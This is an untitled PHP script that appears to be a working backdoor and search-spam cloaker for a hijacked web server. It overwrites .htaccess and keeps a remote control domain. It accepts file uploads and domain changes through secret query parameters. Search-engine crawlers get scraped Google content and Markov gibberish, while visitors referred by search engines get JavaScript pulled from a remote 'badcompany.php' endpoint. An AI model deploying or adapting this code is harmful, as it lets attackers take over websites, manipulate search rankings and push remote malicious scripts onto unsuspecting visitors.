Untitled

<?php
error_reporting(0);
if (isset($_GET['q'])) {
    if (!(preg_match("/^([a-z0-9\-\.\)\(\&\=]*)$/i", $_GET['q']))) {
        die;
    }
}
if (extension_loaded('curl') && function_exists('curl_init') && function_exists('curl_exec')) {
    function l__0($_0) {
        $_1 = curl_init();
        curl_setopt($_1, CURLOPT_URL, $_0);
        curl_setopt($_1, CURLOPT_HEADER, FALSE);
        curl_setopt($_1, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($_1, CURLOPT_FOLLOWLOCATION, TRUE);
        curl_setopt($_1, CURLOPT_TIMEOUT, 20);
        curl_setopt($_1, CURLOPT_PORT, 80);
        curl_setopt($_1, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 2.0.50727; InfoPath.1)');
        $_2 = curl_exec($_1);
        $_3 = curl_getinfo($_1, CURLINFO_HTTP_CODE);
        if ($_3 >= 400) $_2 = false;
        curl_close($_1);
        return $_2;
    }
} else if (function_exists('file_get_contents')) {
    function l__0($_0) {
        return file_get_contents($_0);
    }
} else die('not work');
$_4 = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
@mkdir('.log/');
@chmod('.log/', round(0 + 255.5 + 255.5));
@mkdir('.log/' . $_4);
@chmod('.log/' . $_4, round(0 + 127.75 + 127.75 + 127.75 + 127.75));
$_5 = '.log/' . $_4 . '/xmlrpc.txt';
if (@fopen($_5, 'r')) {
} else {
    $_6 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
    fwrite($_6, 'bestnetblog.net');
    fclose($_6);
}
if ($_GET['q'] == 'alcobro') {
    $_5 = '.htaccess';
    if (file_exists($_5)) {
        $_7 = 'disable';
    } else {
        $_8 = "<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ " . $_SERVER['SCRIPT_NAME'] . "?q=$1 [L]
</IfModule>";
        $_9 = fopen('.htaccess', 'w+');
        fwrite($_9, $_8);
        fclose($_9);
        $_7 = 'enable';
    }
    $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
    $_11 = 'http://' . $_10 . '/logdomain.php?q=' . $_SERVER['HTTP_HOST'];
    $_12 = l__0($_11);
    echo $_12 . $_7;
    die;
}
if ($_GET['dom100500'] != '') {
    $_13 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
    fwrite($_13, $_GET['dom100500']);
    fclose($_13);
    echo '100500ok';
    die;
}
if ($_GET['up100500'] != '') {
    $_14 = '';
    $_14 = $_14 . basename($_FILES['uploaded']['name']);
    $_15 = 1;
    if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $_14)) {
        echo 'up100500';
    }
    echo '<form enctype="multipart/form-data" method="POST"><input name="uploaded" type="file"><input type="submit" value="U"></form>';
    die;
}
function l__1($_16) {
    $_4 = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
    $_17 = isset($_GET['q']) ? str_replace('/', '', urldecode($_GET['q'])) : FALSE;
    $_18 = str_replace('-', '+', $_17);
    $_18 = str_replace('_', '+', $_17);
    $_19 = 'http://www.google.com/search?hl=en&as_q=' . $_18 . '&num=100&as_qdr=all';
    $_20 = l__0($_19);
    preg_match_all('#<div class="s">(.*)<br>#U', $_20, $_21);
    $_22 = array();
    for ($_23 = 0;$_23 < count($_21[round(0 + 1) ]);$_23++) {
        $_24 = trim($_21[round(0 + 1) ][$_23]);
        $_24 = strip_tags($_24, '<em>');
        $_24 = str_replace('em>', 'b>', $_24);
        $_24 = str_replace('...', '. ', $_24);
        $_24 = str_replace('&amp;#39;', '\'', $_24);
        $_24 = str_replace('&#39;', '\'', $_24);
        $_24 = str_replace('#039;', '\'', $_24);
        $_24 = str_replace('&amp;quot;', '', $_24);
        $_24 = str_replace('middot;', '', $_24);
        $_24 = str_replace('quot;', '', $_24);
        $_24 = str_replace('amp;', '', $_24);
        $_24 = str_replace('nbsp;', '', $_24);
        $_24 = str_replace('—', ' ', $_24);
        $_24 = strip_tags($_24);
        array_push($_22, $_24);
    }
    for ($_23 = 0;$_23 < round(0 + 50);$_23++) {
        $_25.= $_22[$_23];
    }
    Class l__2 {
        var $_26 = array();
        function l__2($_27) {
            $_27 = strtolower($_27);
            $_27 = str_replace(array('? ', '! '), '.', $_27);
            $_27 = str_replace(array(' -', '- ', "\t", "\n", "\r\n", '|', '&', '\\', '/', ' :', ' ;', '©', '·'), ' ', $_27);
            $_27 = str_replace(array(')', '(', ']', '[', '—', '\'', '"', '*', '•', '~', '{', '}'), '', $_27);
            $_27 = str_replace(' ,', ',', $_27);
            $_27 = preg_replace('~(\s+\d{1,2}\s+)|(\w*\.\w+)~', ' ', $_27);
            $_27 = preg_replace('~\s+~', ' ', $_27);
            $_28 = explode('. ', $_27);
            $_29 = count($_28);
            for ($_30 = 0;$_30 < $_29;++$_30) {
                $_28[$_30] = explode(' ', $_28[$_30]);
                $_31 = count($_28[$_30]) - 1;
                for ($_32 = 0;$_32 < $_31;++$_32) {
                    $_33 = $_28[$_30][$_32];
                    $this->_26[$_33][] = $_28[$_30][$_32 + 1];
                }
            }
            $_34 = array_keys($this->_26);
            foreach($_34 as $_17) {
                $this->_26[$_17] = array_unique($this->_26[$_17]);
            }
        }
        function l__3($_35) {
            $_36 = 0;
            for ($_30 = 0;$_36 < $_35;++$_30) {
                $_37 = array_rand($this->_26);
                $_38 = mt_rand(5, 12);
                for ($_32 = 0;$_32 < $_38;++$_32) {
                    $_39[$_30][$_32] = $_37;
                    ++$_36;
                    $_40 = $this->_26[$_37][mt_rand(0, count($this->_26[$_37]) - 1) ];
                    if ($_40 == '') $_40 = array_rand($this->_26);
                    $_37 = $_40;
                    if ($_37 == '') break 2;
                }
            }
            foreach($_39 as $_41) {
                $_42 = count($_41);
                if ($_42 <= round(0 + 2)) continue;
                if (strlen($_41[$_42 - 1]) < round(0 + 0.8 + 0.8 + 0.8 + 0.8 + 0.8)) unset($_41[$_42 - 1]);
                $_41[$_42 - round(0 + 2) ] = rtrim($_41[$_42 - round(0 + 2) ], ',:;');
                $_41[$_42 - 1] = rtrim($_41[$_42 - 1], ',:;');
                $_43.= ucfirst(implode(' ', $_41)) . '. ';
            }
            $_43 = str_replace(' .', '.', $_43);
            return $_43;
        }
    }
    $_27 = $_25;
    $_44 = new l__2($_27);
    $_45 = $_44->l__3(1400);
    $_45 = preg_replace('/[^a-zA-Z\., -]+?/', '', $_45);
    $_46 = isset($_GET['q']) ? str_replace('/', '', urldecode($_GET['q'])) : FALSE;
    $_46 = str_replace('-', ' ', $_46);
    $_46 = str_replace('_', ' ', $_46);
    $_47 = str_replace(' ', '+', $_46);
    if ($_GET['page'] != '1') {
        $_48 = '&start=' . ($_GET['page'] - 1) * round(0 + 10.5 + 10.5);
    }
    $_49 = l__0('http://images.google.com/images?q=' . $_47 . '&lr=lang_en' . $_48);
    preg_match_all('/href="?\/imgres\?imgurl=([^\&]+)/', $_49, $_50);
    $_51 = array();
    for ($_32 = 0;$_32 < count($_50[round(0 + 1) ]);$_32++) {
        $_52 = array('right', 'left', 'center');
        array_push($_51, '<img src="' . $_50[1][$_32] . '" alt="' . ucwords($_47) . '" align="' . $_52[array_rand($_52) ] . '">');
    }
    shuffle($_51);
    if (strstr($_SERVER['REQUEST_URI'], '.php')) {
        $_53 = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'] . '?q=';
    } else {
        $_53 = 'http://' . $_SERVER['HTTP_HOST'] . preg_replace('/[^\/]*?$/', '', $_SERVER['SCRIPT_NAME']);
    }
    $_54 = round(0 + 15 + 15);
    $_55 = glob('.log/' . $_4 . '/*.html');
    array_multisort(array_map('filectime', $_55), 3, $_55);
    $_56 = 1;
    $_57 = '';
    foreach($_55 as $_58) {
        if ($_56 > $_54) break;
        preg_match_all('#^\.log/' . $_4 . "/(.*)\.html$#i", $_58, $_59);
        $_57.= '<a href="' . $_53 . $_59[1][0] . '" title="' . str_replace('_', ' ', str_replace('-', ' ', $_59[1][0])) . '">' . str_replace('_', ' ', str_replace('-', ' ', $_59[1][0])) . '</a>, ';
        $_56++;
    }
    $_60 = l__0('http://clients1.google.com/complete/search?hl=en&ds=i&q=' . str_replace(' ', '%20', $_46));
    preg_match_all('|\["([^"]+)",|si', $_60, $_61, 1);
    $_62 = 0;
    array_shift($_61[1]);
    foreach($_61[1] as $_63) {
        $_64.= '<a href=''.$_53.str_replace( '',  ' - ', $_63). '' title=''.$_63. ''>' . $_63 . '</a>, ';
        if ($_62++ > 11) break;
    }
    $_65 = $_53 . $_GET['q'];
    $_66 = '<a href="' . $_65 . '&page=2" title="' . ucwords($_46) . '">' . ucwords($_46) . ' - Page 2</a> | <a href="' . $_65 . '&page=3" title="' . ucwords($_46) . '">' . ucwords($_46) . ' - Page 3</a> | <a href="' . $_65 . '&page=4" title="' . ucwords($_46) . '">' . ucwords($_46) . ' - Page 4</a> | <a href="' . $_65 . '&page=5" title="' . ucwords($_46) . '">' . ucwords($_46) . ' - Page 5</a> | <a href="' . $_65 . '&page=6" title="' . ucwords($_46) . '">' . ucwords($_46) . ' - Page 6</a> | <a href="' . $_65 . '&page=7" title="' . ucwords($_46) . '">' . ucwords($_46) . ' - Page 7</a>';
    $_67 = explode('.', $_45);
    $_2 = array_merge($_67, $_51);
    shuffle($_2);
    foreach($_2 as $_68) {
        $_69.= $_68;
    }
    $_70 = '.log/' . $_4 . '/shab100500.txt';
    if (!file_exists($_70)) {
        $_71 = file_get_contents('http://' . $_SERVER['HTTP_HOST']);
        $_71 = preg_replace('/<meta(.*)name="description"(.*)>/i', '', $_71);
        $_72 = preg_match_all('/<([a-zA-z]+)>(.*)<\/([a-zA-Z]+)>/imsU', $_71, $_73);
        $_74 = 0;
        $_75 = 0;
        for ($_32 = 0;$_32 < $_72;$_32++) {
            if ((preg_match('/\<script/imsU', $_73[0][$_32]) == 0) AND (strlen($_73[0][$_32]) > $_74)) {
                $_74 = strlen($_73[0][$_32]);
                $_75 = $_32;
            }
        }
        $_71 = str_ireplace($_73[0][$_75], $_73[0][$_75] . '<REPLACEME>', $_71);
        $_76 = fopen($_70, 'w');
        fputs($_76, $_71);
        fclose($_76);
    }
    $_77 = '<h1>' . strtoupper($_46) . $_78 . '</h1>
' . $_64 . $_57 . '
' . $_69 . '
<p>' . $_66 . '</p>';
    return $_77;
}
function l__4($_79) {
    $_4 = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
    $_80 = '.log/' . $_4 . '/' . $_79 . '.html' . $_GET['page'];
    if (@file_exists($_80)) return @file_get_contents($_80);
    $_16 = str_replace('-', ' ', $_79);
    $_16 = str_replace('+', ' ', $_79);
    $_81 = l__1($_16);
    $_82 = @fopen($_80, 'w');
    @fwrite($_82, $_81);
    @fclose($_82);
    return $_81;
    $_83 = file_get_contents($_80);
}
$_84 = array('66.228.', '67.195.', '68.142.', '66.196.', '68.180.', '72.30.', '74.6.', '66.94.', '66.163.', '64.75.', '216.32.', '66.163.', '65.52.', '65.53.', '65.54.', '65.55.', '66.249.', '66.102.', '209.85.', '72.14.', '74.125.', '64.68.', '64.233.', '216.239.', '173.194.', '91.184.', '94.231.', '127.0.', '31.43.');
$_85 = getenv('REMOTE_ADDR');
$_86 = explode('.', $_85);
for ($_32 = 0;;$_32++) {
    if ($_84[$_32] == NULL) break;
    $_87 = explode('.', $_84[$_32]);
    if ($_87[0] == $_86[0] && $_87[1] == $_86[1]) {
        if ($_GET['q'] != '') {
            $_70 = '.log/' . $_4 . '/shab100500.txt';
            if (filesize($_70) < round(0 + 200 + 200 + 200 + 200)) {
                $_71 = '<head>
<title>title</title>
</head>
<body>
<REPLACEME>
</body>
</html>';
            } else {
                $_71 = file_get_contents($_70);
            }
            $_88 = basename($_GET['q']);
            $_46 = $_GET['q'];
            $_46 = str_replace('-', ' ', $_46);
            $_46 = str_replace('.html', '', $_46);
            $_71 = preg_replace('/<title>(.*)<\/title>/imsU', '<title>' . ucwords($_46) . '</title>
<meta name="googlebot" content="noarchive">', $_71);
            $_71 = str_ireplace('<REPLACEME>', l__4($_88), $_71);
            print $_71;
            exit;
        }
    }
}
if ($_GET['q'] != '') {
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) {
        echo '<script>';
        include ('.log/' . $_4 . '/iog.txt');
        echo '</script>';
        die;
    }
    if (strpos($_SERVER['HTTP_REFERER'], 'site%') > 0) {
    } else {
        if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
            $_89 = round(0 + 10 + 10 + 10) * round(0 + 15 + 15 + 15 + 15);
            $_90 = '.log/' . $_4 . '/iog.txt';
            if (!file_exists($_90) || time() - filemtime($_90) > $_89) {
                $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
                $_91 = 'http://' . $_10 . '/badcompany.php?q=' . $_4 . $_SERVER['SCRIPT_NAME'];
                $_2 = l__0($_91);
                $_92 = fopen('.log/' . $_4 . '/iog.txt', 'w+');
                fwrite($_92, $_2);
                fclose($_92);
            }
            echo '<script>';
            include ('.log/' . $_4 . '/iog.txt');
            echo '</script>';
            die();
        }
    }
}
header('Location: http://' . $_SERVER['HTTP_HOST']);
?>